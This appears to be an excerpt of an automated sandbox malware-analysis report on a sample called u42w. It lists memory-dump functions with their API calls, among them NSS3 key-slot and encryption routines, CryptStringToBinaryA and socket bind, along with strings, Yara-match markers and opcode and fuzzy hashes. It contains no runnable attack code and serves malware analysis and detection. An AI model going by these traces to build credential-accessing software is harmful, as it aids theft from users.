Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,6C9C5A85), ref: 6C9E2675
PK11_Encrypt.NSS3(?,00001081,00000000,?,?,00000010,?,00000010), ref: 6C9E2659

Part of subcall function 6C993850: TlsGetValue.KERNEL32 ref: 6C99389F
Part of subcall function 6C993850: EnterCriticalSection.KERNEL32(?), ref: 6C9938B3
Part of subcall function 6C993850: PR_Unlock.NSS3(?), ref: 6C9938F1
Part of subcall function 6C993850: TlsGetValue.KERNEL32 ref: 6C99390F
Part of subcall function 6C993850: EnterCriticalSection.KERNEL32(?), ref: 6C993923
Part of subcall function 6C993850: PR_Unlock.NSS3(?), ref: 6C993972

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9E2697
PK11_Encrypt.NSS3(?,?,?,?,00000000,6C9C5A85,?,6C9C5A85), ref: 6C9E2717

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: CriticalEncryptEnterK11_SectionUnlockValue$Errormemcpy
String ID:
API String ID: 3114817199-0
Opcode ID: fb3029a1f1e83e0ba28f84ae2676e541bff31eaa68a094e49989931e1acf387b
Instruction ID: d10767bede4d9929be1ea73108bf02ae35b24b6c6074c09bf78201a09536e961
Opcode Fuzzy Hash: fb3029a1f1e83e0ba28f84ae2676e541bff31eaa68a094e49989931e1acf387b
Instruction Fuzzy Hash: CC411A71A0C78266FB268E19CC85FDB73ACEFE8B14F104609E95406641EA71D58587D2

Uniqueness

Uniqueness Score: -1.00%

Function 004094A0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
Instruction ID: 8ba321113e6e4d0cf3898c04bf9160a1f44f8cb9f34d86efd4b3c4bff5612467
Opcode Fuzzy Hash: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
Instruction Fuzzy Hash: AA119074240308AFEB14CF64CC95FAA77B6FB89711F208059FA159B3D0C7B5AA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6C946410 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

bind.WSOCK32(?,?,?,?,6C946401,?,?,0000001C), ref: 6C946422
WSAGetLastError.WSOCK32(?,?,?,?,6C946401,?,?,0000001C), ref: 6C946432

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: ErrorLastbind
String ID:
API String ID: 2328862993-0
Opcode ID: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction ID: 6248f800bb4da6f7785f1b58487d0bef8c2eb8b7934a5a686cffcea7c9ba353b
Opcode Fuzzy Hash: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction Fuzzy Hash: F9E01D752501046FCF019F75DD0485A37D99F18228750C514F519C7F71E731D4D9D740

Uniqueness

Uniqueness Score: -1.00%

Function 6CA20C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f1701c7a243d89472ed8f80b757ee3218d3d604bb540d18be2c0f4ef33e6e86
Instruction ID: 7c16a3c0758e4bea282c0e66d8a35689d2a84d94bc0cd5068dde994b42b19199
Opcode Fuzzy Hash: 5f1701c7a243d89472ed8f80b757ee3218d3d604bb540d18be2c0f4ef33e6e86
Instruction Fuzzy Hash: E211CEB47043168FCB14DF28D890A6A7BB6FF85368F188479D8198B701DB35E846CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C9944C0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4acdfae43af77f41eeadf045b2adebe8de865e0c01fc0a2422d6ee861eb58526
Instruction ID: 2f424ddd2934ed9aa2c3f065501972980fc0d25f25b1a74cde00a21e898dfdd8
Opcode Fuzzy Hash: 4acdfae43af77f41eeadf045b2adebe8de865e0c01fc0a2422d6ee861eb58526
Instruction Fuzzy Hash: 1B1109B6E002199F8B00CF99D8809EFBBF9EF8C664B554519ED18E7300D230ED158BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C994440 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf2b523420452fc4d8be04ec6e45aefb7778667f7e0110cc29bdc7bc3d8ee709
Instruction ID: 7f5100f993dbdc288b75950ab7059814c5f04e3f49c71e59e77f00342ada4ee6
Opcode Fuzzy Hash: bf2b523420452fc4d8be04ec6e45aefb7778667f7e0110cc29bdc7bc3d8ee709
Instruction Fuzzy Hash: A311C975A002199F9B00DF59D8809EFB7F9EF4C254B16416AED18E7301D630ED158BE1

Uniqueness

Uniqueness Score: -1.00%

Function 0041952A Relevance: 129.2, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041953E

Part of subcall function 00417247: HeapFree.KERNEL32(00000000,00000000,?,00417158,00000000,00421AC0,0041719F,?,?,?,0041720F,00421AC0,?,?,00419FD3,00421AC0), ref: 0041725D
Part of subcall function 00417247: GetLastError.KERNEL32(?,?,00417158,00000000,00421AC0,0041719F,?,?,?,0041720F,00421AC0,?,?,00419FD3,00421AC0), ref: 0041726F

_free.LIBCMT ref: 00419546
_free.LIBCMT ref: 0041954E
_free.LIBCMT ref: 00419556
_free.LIBCMT ref: 0041955E
_free.LIBCMT ref: 00419566
_free.LIBCMT ref: 0041956D
_free.LIBCMT ref: 00419575
_free.LIBCMT ref: 0041957D
_free.LIBCMT ref: 00419585
_free.LIBCMT ref: 0041958D
_free.LIBCMT ref: 00419595
_free.LIBCMT ref: 0041959D
_free.LIBCMT ref: 004195A5
_free.LIBCMT ref: 004195AD
_free.LIBCMT ref: 004195B5
_free.LIBCMT ref: 004195C0
_free.LIBCMT ref: 004195C8
_free.LIBCMT ref: 004195D0
_free.LIBCMT ref: 004195D8
_free.LIBCMT ref: 004195E0
_free.LIBCMT ref: 004195E8
_free.LIBCMT ref: 004195F0
_free.LIBCMT ref: 004195F8
_free.LIBCMT ref: 00419600
_free.LIBCMT ref: 00419608
_free.LIBCMT ref: 00419610
_free.LIBCMT ref: 00419618
_free.LIBCMT ref: 00419620
_free.LIBCMT ref: 00419628
_free.LIBCMT ref: 00419630
_free.LIBCMT ref: 00419638
_free.LIBCMT ref: 00419646
_free.LIBCMT ref: 00419651
_free.LIBCMT ref: 0041965C
_free.LIBCMT ref: 00419667
_free.LIBCMT ref: 00419672
_free.LIBCMT ref: 0041967D
_free.LIBCMT ref: 00419688
_free.LIBCMT ref: 00419693
_free.LIBCMT ref: 0041969E
_free.LIBCMT ref: 004196A9
_free.LIBCMT ref: 004196B4
_free.LIBCMT ref: 004196BF
_free.LIBCMT ref: 004196CA
_free.LIBCMT ref: 004196D5
_free.LIBCMT ref: 004196E0
_free.LIBCMT ref: 004196EB
_free.LIBCMT ref: 004196F9
_free.LIBCMT ref: 00419704
_free.LIBCMT ref: 0041970F
_free.LIBCMT ref: 0041971A
_free.LIBCMT ref: 00419725
_free.LIBCMT ref: 00419730
_free.LIBCMT ref: 0041973B
_free.LIBCMT ref: 00419746
_free.LIBCMT ref: 00419751
_free.LIBCMT ref: 0041975C
_free.LIBCMT ref: 00419767
_free.LIBCMT ref: 00419772
_free.LIBCMT ref: 0041977D
_free.LIBCMT ref: 00419788
_free.LIBCMT ref: 00419793
_free.LIBCMT ref: 0041979E
_free.LIBCMT ref: 004197AC
_free.LIBCMT ref: 004197B7
_free.LIBCMT ref: 004197C2
_free.LIBCMT ref: 004197CD
_free.LIBCMT ref: 004197D8
_free.LIBCMT ref: 004197E3
_free.LIBCMT ref: 004197EE
_free.LIBCMT ref: 004197F9
_free.LIBCMT ref: 00419804
_free.LIBCMT ref: 0041980F
_free.LIBCMT ref: 0041981A
_free.LIBCMT ref: 00419825
_free.LIBCMT ref: 00419830
_free.LIBCMT ref: 0041983B
_free.LIBCMT ref: 00419846
_free.LIBCMT ref: 00419851
_free.LIBCMT ref: 0041985F
_free.LIBCMT ref: 0041986A
_free.LIBCMT ref: 00419875
_free.LIBCMT ref: 00419880
_free.LIBCMT ref: 0041988B
_free.LIBCMT ref: 00419896

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction ID: 5df7b21d12798ad2dd02b2714939a7e9e3589bb161cd2ca89e36415dbd51ea28
Opcode Fuzzy Hash: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction Fuzzy Hash: AE71E331494B009BD7633B32DD03ADA7AB27F04304F10596EB1FB20632DA3678E79A59

Uniqueness

Uniqueness Score: -1.00%

Function 6C9B4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C9A4F51,00000000), ref: 6C9B4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C9A4F51,00000000), ref: 6C9B4C5B
PR_smprintf.NSS3(6CA8AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C9A4F51,00000000), ref: 6C9B4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C9A4F51,00000000), ref: 6C9B4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9B4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9B4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9B4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C9A4F51,00000000), ref: 6C9B4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C9A4F51,00000000), ref: 6C9B4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C9B4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C9B4DA2
free.MOZGLUE(?), ref: 6C9B4DB9
free.MOZGLUE(00000000), ref: 6C9B4DCF

Strings

rust, xrefs: 6C9B4D22
timeout, xrefs: 6C9B4C91
slotFlags, xrefs: 6C9B4D34
ootT, xrefs: 6C9B4D1A
0x%08lx=[%s %s], xrefs: 6C9B4D80
rootFlags, xrefs: 6C9B4D47
every, xrefs: 6C9B4CA1
any, xrefs: 6C9B4C96
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C9B4D9D
%s,%s, xrefs: 6C9B4C4B

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: e3cd376c86a31be7e2d2066400424c3fade28c0332b8c8ce8c8d8c5d8f433964
Instruction ID: 0f424597edee66d305a9d9ea3322bbc7d316fad005fb37b30cc3c770f47d74cf
Opcode Fuzzy Hash: e3cd376c86a31be7e2d2066400424c3fade28c0332b8c8ce8c8d8c5d8f433964
Instruction Fuzzy Hash: F0418DB2A001467BDB115F689C446FF3669AF9270CF048124EC1A6BB01E735E855DBE3

Uniqueness

Uniqueness Score: -1.00%

Function 6C992D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C992DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C992E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C992E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C992E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C964F1C,?,-00000001,00000000,?), ref: 6C992E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C964F1C,?,-00000001,00000000), ref: 6C992E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C992EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C992EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C992EF8
PR_Unlock.NSS3(?), ref: 6C992F62
TlsGetValue.KERNEL32 ref: 6C992F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C992F9E
PR_Unlock.NSS3(?), ref: 6C992FCA
TlsGetValue.KERNEL32 ref: 6C99301A
EnterCriticalSection.KERNEL32(?), ref: 6C99302E
PR_Unlock.NSS3(?), ref: 6C993066
PR_SetError.NSS3(00000000,00000000), ref: 6C993085
PR_Unlock.NSS3(?), ref: 6C9930EC
TlsGetValue.KERNEL32 ref: 6C99310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C993124
PR_Unlock.NSS3(?), ref: 6C99314C

Part of subcall function 6C979180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C9A379E,?,6C979568,00000000,?,6C9A379E,?,00000001,?), ref: 6C97918D
Part of subcall function 6C979180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C9A379E,?,6C979568,00000000,?,6C9A379E,?,00000001,?), ref: 6C9791A0

Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407AD
Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407CD
Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407D6
Part of subcall function 6C9407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C8D204A), ref: 6C9407E4
Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,6C8D204A), ref: 6C940864
Part of subcall function 6C9407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C940880
Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,6C8D204A), ref: 6C9408CB
Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(?,?,6C8D204A), ref: 6C9408D7
Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(?,?,6C8D204A), ref: 6C9408FB

PR_SetError.NSS3(00000000,00000000), ref: 6C99316D

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 2fe97c1286b3248b2d4fbffc32aa8116f18c5b73efb26a52cfb0cfd4265b50c1
Instruction ID: 9ec5e204c29330d71acf5ff913fba51e83a1115c8af1f3dda2970e0bce5ebfe9
Opcode Fuzzy Hash: 2fe97c1286b3248b2d4fbffc32aa8116f18c5b73efb26a52cfb0cfd4265b50c1
Instruction Fuzzy Hash: CFF19F71D006099FDF04DFA4D884BADBBB8BF19318F088169EC15A7721E731E996CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C996CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C996910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C996943
Part of subcall function 6C996910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C996957
Part of subcall function 6C996910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C996972
Part of subcall function 6C996910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C996983
Part of subcall function 6C996910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C9969AA
Part of subcall function 6C996910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C9969BE
Part of subcall function 6C996910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C9969D2
Part of subcall function 6C996910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C9969DF
Part of subcall function 6C996910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C996A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C996D8C
free.MOZGLUE(00000000), ref: 6C996DC5
free.MOZGLUE(?), ref: 6C996DD6
free.MOZGLUE(?), ref: 6C996DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C996E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C996E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C996E72
free.MOZGLUE(?), ref: 6C996EA7
free.MOZGLUE(?), ref: 6C996EC4
free.MOZGLUE(?), ref: 6C996ED5
free.MOZGLUE(00000000), ref: 6C996EE3
free.MOZGLUE(?), ref: 6C996EF4
free.MOZGLUE(?), ref: 6C996F08
free.MOZGLUE(00000000), ref: 6C996F35
free.MOZGLUE(?), ref: 6C996F44
free.MOZGLUE(?), ref: 6C996F5B
free.MOZGLUE(00000000), ref: 6C996F65

Part of subcall function 6C996C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C99781D,00000000,6C98BE2C,?,6C996B1D,?,?,?,?,00000000,00000000,6C99781D), ref: 6C996C40
Part of subcall function 6C996C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C99781D,?,6C98BE2C,?), ref: 6C996C58
Part of subcall function 6C996C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C99781D), ref: 6C996C6F
Part of subcall function 6C996C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C996C84
Part of subcall function 6C996C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C996C96
Part of subcall function 6C996C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C996CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C996F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C996FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C996FF4

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID:
API String ID: 1304971872-0
Opcode ID: bd5e0ba98e854e8fd34b39c6e76170b176ab5fdbdfdf3abc7ff74d852ec31a81
Instruction ID: 83da1a8cb548a4cfc7ef8cb7c4518d8faa0b6101fb865bb6005dc52ab43a44cb
Opcode Fuzzy Hash: bd5e0ba98e854e8fd34b39c6e76170b176ab5fdbdfdf3abc7ff74d852ec31a81
Instruction Fuzzy Hash: B8B15EB0E0120A9FEF40DBE5DD44B9EBBB9AF05348F180025E815E7A40E735E965CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C994C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C994C4C
EnterCriticalSection.KERNEL32(?), ref: 6C994C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C994CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C994CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C994CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C994D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C994D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C994DB7

Part of subcall function 6C9FDD70: TlsGetValue.KERNEL32 ref: 6C9FDD8C
Part of subcall function 6C9FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9FDDB4

Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407AD
Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407CD
Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407D6
Part of subcall function 6C9407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C8D204A), ref: 6C9407E4
Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,6C8D204A), ref: 6C940864
Part of subcall function 6C9407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C940880
Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,6C8D204A), ref: 6C9408CB
